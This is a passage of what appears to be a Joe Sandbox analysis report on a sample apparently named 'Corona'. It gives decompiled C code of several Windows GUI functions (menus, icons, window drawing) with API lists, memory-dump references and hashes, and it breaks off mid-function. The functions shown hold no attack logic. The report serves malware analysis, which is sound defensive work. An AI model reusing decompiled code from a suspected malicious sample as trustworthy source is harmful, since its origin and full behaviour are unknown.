                                  0x0044a8f7
                                  0x0044a8fa
                                  0x0044a8ff
                                  0x0044a902
                                  0x0044a90a
                                  0x0044a914
                                  0x0044a919
                                  0x0044a921
                                  0x0044a924
                                  0x0044a92d
                                  0x0044a933
                                  0x0044a938
                                  0x0044a93d
                                  0x0044a945
                                  0x0044a94f
                                  0x0044a954
                                  0x0044a955
                                  0x0044a95a
                                  0x0044a95d
                                  0x0044a963
                                  0x0044a96a
                                  0x0044a96b
                                  0x0044a970
                                  0x0044a973
                                  0x0044a988
                                  0x0044a992
                                  0x0044a998
                                  0x0044a998
                                  0x0044a99d
                                  0x0044a9a2
                                  0x0044a9ae
                                  0x0044a9c9
                                  0x0044a9ce
                                  0x0044a9ce
                                  0x0044a9b0
                                  0x0044a9b3
                                  0x0044a9b3
                                  0x0044a9d6
                                  0x0044a9dc
                                  0x0044a9e0
                                  0x0044a9f5
                                  0x0044a9fd
                                  0x0044aa0b
                                  0x0044aa0f
                                  0x0044aa0f
                                  0x0044aa14
                                  0x0044aa17
                                  0x0044aa1a
                                  0x0044aa27

                                  APIs
                                  • GetCapture.USER32 ref: 0044A8B1
                                  • GetCapture.USER32 ref: 0044A8C0
                                  • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 0044A8C6
                                  • ReleaseCapture.USER32(00000000,0044AB08), ref: 0044A8CB
                                  • GetActiveWindow.USER32 ref: 0044A8F2
                                  • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 0044A988
                                  • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 0044A9F5
                                  • GetActiveWindow.USER32 ref: 0044AA04
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CaptureMessageSend$ActiveWindow$Release
                                  • String ID:
                                  • API String ID: 862346643-0
                                  • Opcode ID: f768e723e21f48cef5d9a3aaf8ccbb2326ed41d758750cb9bf05cde070ac9dc9
                                  • Instruction ID: 49d063c2d4033cf090083a411ad423d85b49a9e64d15445e4ea0c99790836548
                                  • Opcode Fuzzy Hash: f768e723e21f48cef5d9a3aaf8ccbb2326ed41d758750cb9bf05cde070ac9dc9
                                  • Instruction Fuzzy Hash: 78515E30A40204AFEB04EF69C956B9E77F5FB49304F1544BAF400A73A2D778AE50CB49
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00432F30, Relevance: 12.1, APIs: 8, Instructions: 123COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00432F30(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				int _v16;
				char _v20;
				struct tagRECT _v36;
				signed int _t54;
				intOrPtr _t59;
				int _t61;
				void* _t63;
				void* _t66;
				void* _t82;
				int _t98;
				struct HDC__* _t99;

				_t99 = __edx;
				_t82 = __eax;
				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
				_v16 = SaveDC(__edx);
				E0042D130(__edx, _a4, __ecx);
				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
				_t98 = 0;
				_v12 = 0;
				if((GetWindowLongA(E00434EF4(_t82), 0xffffffec) & 0x00000002) == 0) {
					_t54 = GetWindowLongA(E00434EF4(_t82), 0xfffffff0);
					__eflags = _t54 & 0x00800000;
					if((_t54 & 0x00800000) != 0) {
						_v12 = 3;
						_t98 = 0xa00f;
					}
				} else {
					_v12 = 0xa;
					_t98 = 0x200f;
				}
				if(_t98 != 0) {
					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
					DrawEdge(_t99,  &_v36, _v12, _t98);
					E0042D130(_t99, _v36.top, _v36.left);
					IntersectClipRect(_t99, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
				}
				E0042F98C(_t82, _t99, 0x14, 0);
				E0042F98C(_t82, _t99, 0xf, 0);
				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
				if(_t59 == 0) {
					L12:
					_t61 = RestoreDC(_t99, _v16);
					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
					return _t61;
				} else {
					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
					if(_t63 < 0) {
						goto L12;
					}
					_v20 = _t63 + 1;
					_v8 = 0;
					do {
						_t66 = E004136F8( *((intOrPtr*)(_t82 + 0x19c)), _v8);
						_t107 =  *((char*)(_t66 + 0x57));
						if( *((char*)(_t66 + 0x57)) != 0) {
							E00432F30(_t66,  *((intOrPtr*)(_t66 + 0x40)), _t99, _t107,  *((intOrPtr*)(_t66 + 0x44)));
						}
						_v8 = _v8 + 1;
						_t36 =  &_v20;
						 *_t36 = _v20 - 1;
					} while ( *_t36 != 0);
					goto L12;
				}
			}
















                                  0x00432f3b
                                  0x00432f3d
                                  0x00432f3f
                                  0x00432f4b
                                  0x00432f55
                                  0x00432f67
                                  0x00432f6c
                                  0x00432f70
                                  0x00432f85
                                  0x00432f9f
                                  0x00432fa4
                                  0x00432fa9
                                  0x00432fab
                                  0x00432fb2
                                  0x00432fb2
                                  0x00432f87
                                  0x00432f87
                                  0x00432f8e
                                  0x00432f8e
                                  0x00432fb9
                                  0x00432fcb
                                  0x00432fda
                                  0x00432fe7
                                  0x00432fff
                                  0x00432fff
                                  0x0043300f
                                  0x0043301f
                                  0x00433024
                                  0x0043302c
                                  0x0043306b
                                  0x00433070
                                  0x00433075
                                  0x00433081
                                  0x0043302e
                                  0x00433031
                                  0x00433034
                                  0x00000000
                                  0x00000000
                                  0x00433037
                                  0x0043303a
                                  0x00433041
                                  0x0043304a
                                  0x0043304f
                                  0x00433053
                                  0x0043305e
                                  0x0043305e
                                  0x00433063
                                  0x00433066
                                  0x00433066
                                  0x00433066
                                  0x00000000
                                  0x00433041

                                  APIs
                                  • SaveDC.GDI32 ref: 00432F46
                                    • Part of subcall function 0042D130: GetWindowOrgEx.GDI32(?), ref: 0042D13E
                                    • Part of subcall function 0042D130: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 0042D154
                                  • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00432F67
                                  • GetWindowLongA.USER32 ref: 00432F7D
                                  • GetWindowLongA.USER32 ref: 00432F9F
                                  • SetRect.USER32 ref: 00432FCB
                                  • DrawEdge.USER32(?,?,?,00000000), ref: 00432FDA
                                  • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00432FFF
                                  • RestoreDC.GDI32(?,?), ref: 00433070
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
                                  • String ID:
                                  • API String ID: 2976466617-0
                                  • Opcode ID: 713d136c56e4b7bb8461f56c2e576d34430783573870ff1f186abf40c795624c
                                  • Instruction ID: 95613bb5b6831907de8f8b08e7580be1b75c51429df70aadc16fbd64d1d5bfe6
                                  • Opcode Fuzzy Hash: 713d136c56e4b7bb8461f56c2e576d34430783573870ff1f186abf40c795624c
                                  • Instruction Fuzzy Hash: A0415571B001146BDB14EF99CC81FAFB7B8AF49704F10416AF905EB386DA79DD0187A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041DC04, Relevance: 12.1, APIs: 8, Instructions: 79COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 26%
                                  			E0041DC04(void* __ebx) {
				intOrPtr _v8;
				char _v1000;
				char _v1004;
				char _v1032;
				signed int _v1034;
				short _v1036;
				void* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t45;
				intOrPtr _t52;
				void* _t54;
				void* _t55;

				_t54 = _t55;
				_v1036 = 0x300;
				_v1034 = 0x10;
				_t25 = E004028B8(_t24, 0x40,  &_v1032);
				_push(0);
				L0040638C();
				_v8 = _t25;
				_push(_t54);
				_push(0x41dd01);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55 + 0xfffffbf8;
				_push(0x68);
				_t27 = _v8;
				_push(_t27);
				L004060D4();
				_t45 = _t27;
				if(_t45 >= 0x10) {
					_push( &_v1032);
					_push(8);
					_push(0);
					_push(_v8);
					L00406114();
					if(_v1004 != 0xc0c0c0) {
						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x424);
						_push(8);
						_push(_t45 - 8);
						_push(_v8);
						L00406114();
					} else {
						_push( &_v1004);
						_push(1);
						_push(_t45 - 8);
						_push(_v8);
						L00406114();
						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x420);
						_push(7);
						_push(_t45 - 7);
						_push(_v8);
						L00406114();
						_push( &_v1000);
						_push(1);
						_push(7);
						_push(_v8);
						L00406114();
					}
				}
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(E0041DD08);
				_t29 = _v8;
				_push(_t29);
				_push(0);
				L004065C4();
				return _t29;
			}

















                                  0x0041dc05
                                  0x0041dc0e
                                  0x0041dc17
                                  0x0041dc2b
                                  0x0041dc30
                                  0x0041dc32
                                  0x0041dc37
                                  0x0041dc3c
                                  0x0041dc3d
                                  0x0041dc42
                                  0x0041dc45
                                  0x0041dc48
                                  0x0041dc4a
                                  0x0041dc4d
                                  0x0041dc4e
                                  0x0041dc53
                                  0x0041dc58
                                  0x0041dc64
                                  0x0041dc65
                                  0x0041dc67
                                  0x0041dc6c
                                  0x0041dc6d
                                  0x0041dc7c
                                  0x0041dcd8
                                  0x0041dcd9
                                  0x0041dcde
                                  0x0041dce2
                                  0x0041dce3
                                  0x0041dc7e
                                  0x0041dc84
                                  0x0041dc85
                                  0x0041dc8c
                                  0x0041dc90
                                  0x0041dc91
                                  0x0041dca4
                                  0x0041dca5
                                  0x0041dcaa
                                  0x0041dcae
                                  0x0041dcaf
                                  0x0041dcba
                                  0x0041dcbb
                                  0x0041dcbd
                                  0x0041dcc2
                                  0x0041dcc3
                                  0x0041dcc3
                                  0x0041dc7c
                                  0x0041dcea
                                  0x0041dced
                                  0x0041dcf0
                                  0x0041dcf5
                                  0x0041dcf8
                                  0x0041dcf9
                                  0x0041dcfb
                                  0x0041dd00

                                  APIs
                                  • 72E7AC50.USER32(00000000), ref: 0041DC32
                                  • 72E7AD70.GDI32(?,00000068,00000000,0041DD01,?,00000000), ref: 0041DC4E
                                  • 72E7AEF0.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041DD01,?,00000000), ref: 0041DC6D
                                  • 72E7AEF0.GDI32(?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,0041DD01,?,00000000), ref: 0041DC91
                                  • 72E7AEF0.GDI32(?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,0041DD01), ref: 0041DCAF
                                  • 72E7AEF0.GDI32(?,00000007,00000001,?,?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?), ref: 0041DCC3
                                  • 72E7AEF0.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041DD01,?,00000000), ref: 0041DCE3
                                  • 72E7B380.USER32(00000000,?,0041DD08,0041DD01,?,00000000), ref: 0041DCFB
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: B380
                                  • String ID:
                                  • API String ID: 120756276-0
                                  • Opcode ID: 61df3c1615a89bef6daede8d5693667e2c5544e3eab6bced7f8ccb98f79293a7
                                  • Instruction ID: 255784562e72748e334826b2f34e1b3fe2587b1faa5496ccafe83d386e29cfa1
                                  • Opcode Fuzzy Hash: 61df3c1615a89bef6daede8d5693667e2c5544e3eab6bced7f8ccb98f79293a7
                                  • Instruction Fuzzy Hash: 312141F1A40208AADB10DBA5CD86FAE72ECEB48704F5104A6F705FB1C1D6799E548B28
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043E11C, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 187windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 87%
                                  			E0043E11C(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				char _v13;
				struct tagMENUITEMINFOA _v61;
				char _v68;
				intOrPtr _t103;
				CHAR* _t109;
				char _t115;
				short _t149;
				void* _t154;
				intOrPtr _t161;
				intOrPtr _t184;
				struct HMENU__* _t186;
				int _t190;
				void* _t192;
				intOrPtr _t193;
				void* _t196;
				void* _t205;

				_t155 = __ecx;
				_v68 = 0;
				_v12 = 0;
				_v5 = __ecx;
				_t186 = __edx;
				_t154 = __eax;
				_push(_t196);
				_push(0x43e377);
				_push( *[fs:eax]);
				 *[fs:eax] = _t196 + 0xffffffc0;
				if( *((char*)(__eax + 0x3e)) == 0) {
					L22:
					_pop(_t161);
					 *[fs:eax] = _t161;
					_push(0x43e37e);
					E00403E4C( &_v68);
					return E00403E4C( &_v12);
				}
				E00403EE4( &_v12,  *((intOrPtr*)(__eax + 0x30)));
				if(E00440098(_t154) <= 0) {
					__eflags =  *((short*)(_t154 + 0x60));
					if( *((short*)(_t154 + 0x60)) == 0) {
						L8:
						if((GetVersion() & 0x000000ff) < 4) {
							_t190 =  *(0x450ba4 + ((E00404258( *((intOrPtr*)(_t154 + 0x30)), 0x43e39c) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x00450B98 |  *0x00450B88 |  *0x00450B90 | 0x00000400;
							_t103 = E00440098(_t154);
							__eflags = _t103;
							if(_t103 <= 0) {
								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E0040430C(_v12));
							} else {
								_t109 = E0040430C( *((intOrPtr*)(_t154 + 0x30)));
								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E0043E62C(_t154), _t109);
							}
							goto L22;
						}
						_v61.cbSize = 0x2c;
						_v61.fMask = 0x3f;
						_t192 = E00440654(_t154);
						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E0043FC70(_t154) == 0) {
							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
								L14:
								_t115 = 0;
								goto L16;
							}
							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
							if(_t205 == 0) {
								goto L15;
							}
							goto L14;
						} else {
							L15:
							_t115 = 1;
							L16:
							_v13 = _t115;
							_v61.fType =  *(0x450bd8 + ((E00404258( *((intOrPtr*)(_t154 + 0x30)), 0x43e39c) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x00450BD0 |  *0x00450BAC |  *0x00450BE0 |  *0x00450BE8;
							_v61.fState =  *0x00450BB8 |  *0x00450BC8 |  *0x00450BC0;
							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
							_v61.hSubMenu = 0;
							_v61.hbmpChecked = 0;
							_v61.hbmpUnchecked = 0;
							_v61.dwTypeData = E0040430C(_v12);
							if(E00440098(_t154) > 0) {
								_v61.hSubMenu = E0043E62C(_t154);
							}
							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
							goto L22;
						}
					}
					_t193 =  *((intOrPtr*)(_t154 + 0x64));
					__eflags = _t193;
					if(_t193 == 0) {
						L7:
						_push(_v12);
						_push(0x43e390);
						E0043D780( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
						_push(_v68);
						E004041CC();
						goto L8;
					}
					__eflags =  *((intOrPtr*)(_t193 + 0x64));
					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
						goto L7;
					}
					_t184 =  *0x43d010; // 0x43d05c
					_t149 = E00403288( *((intOrPtr*)(_t193 + 4)), _t184);
					__eflags = _t149;
					if(_t149 != 0) {
						goto L8;
					}
					goto L7;
				}
				_v61.hSubMenu = E0043E62C(_t154);
				goto L8;
			}





















                                  0x0043e11c
                                  0x0043e127
                                  0x0043e12a
                                  0x0043e12d
                                  0x0043e130
                                  0x0043e132
                                  0x0043e136
                                  0x0043e137
                                  0x0043e13c
                                  0x0043e13f
                                  0x0043e146
                                  0x0043e359
                                  0x0043e35b
                                  0x0043e35e
                                  0x0043e361
                                  0x0043e369
                                  0x0043e376
                                  0x0043e376
                                  0x0043e152
                                  0x0043e160
                                  0x0043e16e
                                  0x0043e173
                                  0x0043e1b8
                                  0x0043e1c6
                                  0x0043e312
                                  0x0043e31a
                                  0x0043e31f
                                  0x0043e321
                                  0x0043e354
                                  0x0043e323
                                  0x0043e326
                                  0x0043e33b
                                  0x0043e33b
                                  0x00000000
                                  0x0043e321
                                  0x0043e1cc
                                  0x0043e1d3
                                  0x0043e1e1
                                  0x0043e1e5
                                  0x0043e1fc
                                  0x0043e20a
                                  0x0043e20a
                                  0x00000000
                                  0x0043e20a
                                  0x0043e206
                                  0x0043e208
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0043e20e
                                  0x0043e20e
                                  0x0043e20e
                                  0x0043e210
                                  0x0043e210
                                  0x0043e25f
                                  0x0043e286
                                  0x0043e28d
                                  0x0043e292
                                  0x0043e297
                                  0x0043e29c
                                  0x0043e2a7
                                  0x0043e2b3
                                  0x0043e2bc
                                  0x0043e2bc
                                  0x0043e2c8
                                  0x00000000
                                  0x0043e2c8
                                  0x0043e1e5
                                  0x0043e175
                                  0x0043e178
                                  0x0043e17a
                                  0x0043e194
                                  0x0043e194
                                  0x0043e197
                                  0x0043e1a3
                                  0x0043e1a8
                                  0x0043e1b3
                                  0x00000000
                                  0x0043e1b3
                                  0x0043e17c
                                  0x0043e180
                                  0x00000000
                                  0x00000000
                                  0x0043e185
                                  0x0043e18b
                                  0x0043e190
                                  0x0043e192
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0043e192
                                  0x0043e169
                                  0x00000000

                                  APIs
                                  • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 0043E2C8
                                  • GetVersion.KERNEL32(00000000,0043E377), ref: 0043E1B8
                                    • Part of subcall function 0043E62C: CreatePopupMenu.USER32(?,0043E333,00000000,00000000,0043E377), ref: 0043E647
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Menu$CreateInsertItemPopupVersion
                                  • String ID: ,$?
                                  • API String ID: 133695497-2308483597
                                  • Opcode ID: 15f3eb2d7d0ead6c1e95766e58730902921cec33486689b8c9061bc6ee80ccf1
                                  • Instruction ID: fde27072d65e569b6bd3f873415a7b9757652b8a083f06bcfa94214efa35d3c7
                                  • Opcode Fuzzy Hash: 15f3eb2d7d0ead6c1e95766e58730902921cec33486689b8c9061bc6ee80ccf1
                                  • Instruction Fuzzy Hash: B861ED30A012459BDB10EFBAD88169A7BE9AF4D304F0465BAED40E73D6D738E805CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041E1F4, Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E0041E1F4() {
				struct HINSTANCE__* _t145;
				long _t166;
				intOrPtr _t167;
				intOrPtr _t186;
				void* _t192;
				BYTE* _t193;
				BYTE* _t196;
				intOrPtr _t197;
				void* _t198;
				intOrPtr _t199;

				 *((intOrPtr*)(_t198 - 0x24)) = 0;
				 *((intOrPtr*)(_t198 - 0x20)) = E0041E068( *( *((intOrPtr*)(_t198 - 0x10)) + 2) & 0x0000ffff);
				_t192 =  *((intOrPtr*)(_t198 - 0xc)) - 1;
				if(_t192 > 0) {
					_t197 = 1;
					do {
						_t167 = E0041E068( *( *((intOrPtr*)(_t198 - 0x10)) + 2 + (_t197 + _t197) * 8) & 0x0000ffff);
						if(_t167 <=  *((intOrPtr*)(_t198 - 0x1c)) && _t167 >=  *((intOrPtr*)(_t198 - 0x20)) && E0041E074( *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8,  *((intOrPtr*)(_t198 - 0x10)) + (_t197 + _t197) * 8, _t198) != 0) {
							 *((intOrPtr*)(_t198 - 0x24)) = _t197;
							 *((intOrPtr*)(_t198 - 0x20)) = _t167;
						}
						_t197 = _t197 + 1;
						_t192 = _t192 - 1;
						_t204 = _t192;
					} while (_t192 != 0);
				}
				 *(_t198 - 0x40) =  *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8;
				 *( *(_t198 + 8)) =  *( *(_t198 - 0x40)) & 0x000000ff;
				( *(_t198 + 8))[1] = ( *(_t198 - 0x40))[1] & 0x000000ff;
				 *((intOrPtr*)(_t198 - 0x2c)) = E004078A0(( *(_t198 - 0x40))[8], _t204);
				 *[fs:eax] = _t199;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 0x14))( *[fs:eax], 0x41e3db, _t198);
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 0xc))();
				E0041DEAC( *((intOrPtr*)(_t198 - 0x2c)),  *((intOrPtr*)(_t198 - 0x2c)), _t198 - 0x38, _t198 - 0x34, _t192,  *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))), _t204,  *(_t198 + 8));
				GetObjectA( *(_t198 - 0x38), 0x18, _t198 - 0x70);
				GetObjectA( *(_t198 - 0x34), 0x18, _t198 - 0x58);
				_t166 =  *(_t198 - 0x64) *  *(_t198 - 0x68) * ( *(_t198 - 0x60) & 0x0000ffff);
				 *(_t198 - 0x3c) =  *(_t198 - 0x4c) *  *(_t198 - 0x50) * ( *(_t198 - 0x48) & 0x0000ffff);
				 *((intOrPtr*)(_t198 - 0x18)) =  *(_t198 - 0x3c) + _t166;
				 *(_t198 - 0x30) = E004078A0( *((intOrPtr*)(_t198 - 0x18)), _t204);
				_push(_t198);
				_push(0x41e3b8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t199;
				_t193 =  *(_t198 - 0x30);
				_t196 =  &(( *(_t198 - 0x30))[_t166]);
				GetBitmapBits( *(_t198 - 0x38), _t166, _t193);
				GetBitmapBits( *(_t198 - 0x34),  *(_t198 - 0x3c), _t196);
				DeleteObject( *(_t198 - 0x34));
				DeleteObject( *(_t198 - 0x38));
				_t145 =  *0x452664; // 0x400000
				 *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) = CreateIcon(_t145,  *( *(_t198 + 8)), ( *(_t198 + 8))[1],  *(_t198 - 0x48),  *(_t198 - 0x46), _t193, _t196);
				if( *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) == 0) {
					E0041D61C(_t166);
				}
				_pop(_t186);
				 *[fs:eax] = _t186;
				_push(E0041E3BF);
				return E004026DC( *(_t198 - 0x30));
			}













                                  0x0041e1f6
                                  0x0041e205
                                  0x0041e20b
                                  0x0041e20e
                                  0x0041e210
                                  0x0041e215
                                  0x0041e226
                                  0x0041e22b
                                  0x0041e252
                                  0x0041e255
                                  0x0041e255
                                  0x0041e258
                                  0x0041e259
                                  0x0041e259
                                  0x0041e259
                                  0x0041e215
                                  0x0041e267
                                  0x0041e273
                                  0x0041e27f
                                  0x0041e28d
                                  0x0041e29b
                                  0x0041e2b5
                                  0x0041e2c8
                                  0x0041e2d7
                                  0x0041e2e6
                                  0x0041e2f5
                                  0x0041e305
                                  0x0041e314
                                  0x0041e31c
                                  0x0041e327
                                  0x0041e32c
                                  0x0041e32d
                                  0x0041e332
                                  0x0041e335
                                  0x0041e338
                                  0x0041e33e
                                  0x0041e346
                                  0x0041e354
                                  0x0041e35d
                                  0x0041e366
                                  0x0041e382
                                  0x0041e390
                                  0x0041e398
                                  0x0041e39a
                                  0x0041e39a
                                  0x0041e3a1
                                  0x0041e3a4
                                  0x0041e3a7
                                  0x0041e3b7

                                  APIs
                                  • GetObjectA.GDI32(?,00000018,?), ref: 0041E2E6
                                  • GetObjectA.GDI32(?,00000018,?), ref: 0041E2F5
                                  • GetBitmapBits.GDI32(?,?,?), ref: 0041E346
                                  • GetBitmapBits.GDI32(?,?,?), ref: 0041E354
                                  • DeleteObject.GDI32(?), ref: 0041E35D
                                  • DeleteObject.GDI32(?), ref: 0041E366
                                  • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041E388
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Object$BitmapBitsDelete$CreateIcon
                                  • String ID:
                                  • API String ID: 1030595962-0
                                  • Opcode ID: 2820be2fcb5549e6277aec9d20877ffd7f8e5978633c69eaa508542398d76b9d
                                  • Instruction ID: a83c9b2144be7aee3e156f90ef19fdfa459a05af16aa8835f11f036cefd65e45
                                  • Opcode Fuzzy Hash: 2820be2fcb5549e6277aec9d20877ffd7f8e5978633c69eaa508542398d76b9d
                                  • Instruction Fuzzy Hash: 6461F475A00219AFCB00DFA9C881AEEBBF9FF49304B154466F904EB351D735AD91CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004363D0, Relevance: 10.7, APIs: 7, Instructions: 156COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E004363D0(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				void _v12;
				intOrPtr _v16;
				int _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr* _t80;
				intOrPtr _t91;
				void* _t119;
				intOrPtr _t136;
				intOrPtr _t145;
				void* _t148;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t119 = __ecx;
				_v8 = __eax;
				_t145 =  *0x451104; // 0x452bb4
				 *((char*)(_v8 + 0x210)) = 1;
				_push(_t148);
				_push(0x4365a9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t148 + 0xffffffe0;
				E0042E814(_v8, __ecx, __ecx, _t145);
				_v16 = _v16 + 4;
				E0042FA30(_v8,  &_v28);
				if(E0044B814() <  *(_v8 + 0x4c) + _v24) {
					_v24 = E0044B814() -  *(_v8 + 0x4c);
				}
				if(E0044B820() <  *(_v8 + 0x48) + _v28) {
					_v28 = E0044B820() -  *(_v8 + 0x48);
				}
				if(E0044B808() > _v28) {
					_v28 = E0044B808();
				}
				if(E0044B7FC() > _v16) {
					_v16 = E0044B7FC();
				}
				SetWindowPos(E00434EF4(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E0040410C(_t119) < 0x64 &&  *0x4509d0 != 0) {
